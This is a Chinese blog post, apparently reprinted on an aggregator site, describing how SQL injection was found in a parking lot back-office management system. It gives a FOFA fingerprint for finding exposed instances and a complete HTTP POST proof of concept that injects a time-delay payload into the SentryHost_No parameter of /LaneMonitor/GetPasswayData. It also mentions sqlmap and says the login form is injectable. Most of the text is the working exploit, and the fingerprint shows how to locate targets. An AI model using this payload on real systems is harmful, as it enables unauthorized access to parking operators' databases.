当前位置: 首页 > news >正文

记一次停车场后台管理系统漏洞挖掘

news 来源:原创 2024/9/28 16:24:23

漏洞描述

停车场后台管理系统是一种专为停车场管理者设计的综合管理平台,旨在提供全面、高效、智能的停车场运营管理解决方案,系统利用现代信息技术,如物联网、大数据、云计算等,实现对停车场内车辆进出、车位管理、费用结算、安全监控等各个环节的自动化、智能化管理。该系统能够显著提升停车场的管理效率,降低运营成本,并为车主提供更加便捷、舒适的停车体验。停车场后台管理系统多接口存在SQL注入漏洞

 漏洞复现

FOFA:

icon_hash="938984120"

记录

因为这个登录框有个SQL注入,想着再挖挖其他的

JSFinder看一下接口,找到3个接口

查看/LaneMonitor/GetPasswayData接口,是一个这个页面

查询接口,尝试SQL注入

POC

POST /LaneMonitor/GetPasswayData HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33SentryHost_No=1';SELECT+SLEEP(4)#

延时4秒

sqlmap

相关文章:

  • 让具身智能更快更强!华东师大上大提出TinyVLA:高效视觉-语言-动作模型,遥遥领先
  • 小麦生长状态检测系统源码分享
  • 第十章 【后端】商品分类管理微服务 > 分类列表查询接口(10.8.3)——MyBatis-Plus 逻辑删除
  • Ansible 剧本的执行
  • 设备管理系统-TPM(PC+APP/PDA全流程)高保真Axure原型 源文件分享
  • 【二十七】【QT开发应用】VS如何复制项目,QT无边窗窗口Pro版本,信号与信号槽的应用,背景图片自适应控件大小
  • 文件上传、amrkdown编辑器
  • 第十章 【后端】商品分类管理微服务 > 分类列表查询接口(10.8.2)——MyBatis-Plus 自动填充
  • Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)
  • 从0开始深度学习(6)——Pytorch动态图机制(前向传播、反向传播)
  • Windows环境下Node.js多版本切换的实用指南
  • CS61b学习 part 2
  • element-plus中日历组件设置起始为周一
  • Java 常用的一些Collection的实现类
  • HTML和CSS做一个无脚本的手风琴页面(保姆级)
  • CentOS学习笔记 - 12. Nginx搭建Centos7.5远程repo
  • GitUp, 你不可错过的秀外慧中的git工具
  • MQ框架的比较
  • MySQL Access denied for user 'root'@'localhost' 解决方法
  • OSS Web直传 (文件图片)
  • Python 使用 Tornado 框架实现 WebHook 自动部署 Git 项目
  • VirtualBox 安装过程中出现 Running VMs found 错误的解决过程
  • windows下mongoDB的环境配置
  • 今年的LC3大会没了?
  • 蓝海存储开关机注意事项总结
  • 项目管理碎碎念系列之一:干系人管理
  • 消息队列系列二(IOT中消息队列的应用)
  • 走向全栈之MongoDB的使用
  • ​你们这样子,耽误我的工作进度怎么办?
  • ​如何使用ArcGIS Pro制作渐变河流效果
  • # Maven错误Error executing Maven
  • #QT(QCharts绘制曲线)
  • #systemverilog# 之 event region 和 timeslot 仿真调度(十)高层次视角看仿真调度事件的发生
  • ()、[]、{}、(())、[[]]等各种括号的使用
  • (2)nginx 安装、启停
  • (C++17) std算法之执行策略 execution
  • (java版)排序算法----【冒泡,选择,插入,希尔,快速排序,归并排序,基数排序】超详细~~
  • (js)循环条件满足时终止循环
  • (JS基础)String 类型
  • (第61天)多租户架构(CDB/PDB)
  • (佳作)两轮平衡小车(原理图、PCB、程序源码、BOM等)
  • (数位dp) 算法竞赛入门到进阶 书本题集
  • (四)linux文件内容查看
  • (五)大数据实战——使用模板虚拟机实现hadoop集群虚拟机克隆及网络相关配置
  • (转)关于pipe()的详细解析
  • (转载)微软数据挖掘算法:Microsoft 时序算法(5)
  • *p=a是把a的值赋给p,p=a是把a的地址赋给p。
  • .[hudsonL@cock.li].mkp勒索病毒数据怎么处理|数据解密恢复
  • .axf 转化 .bin文件 的方法
  • .htaccess配置重写url引擎
  • .NET 4.0中的泛型协变和反变
  • .NET Core WebAPI中使用Log4net 日志级别分类并记录到数据库
  • .NET Core中Emit的使用
  • .net on S60 ---- Net60 1.1发布 支持VS2008以及新的特性
  • .NET是什么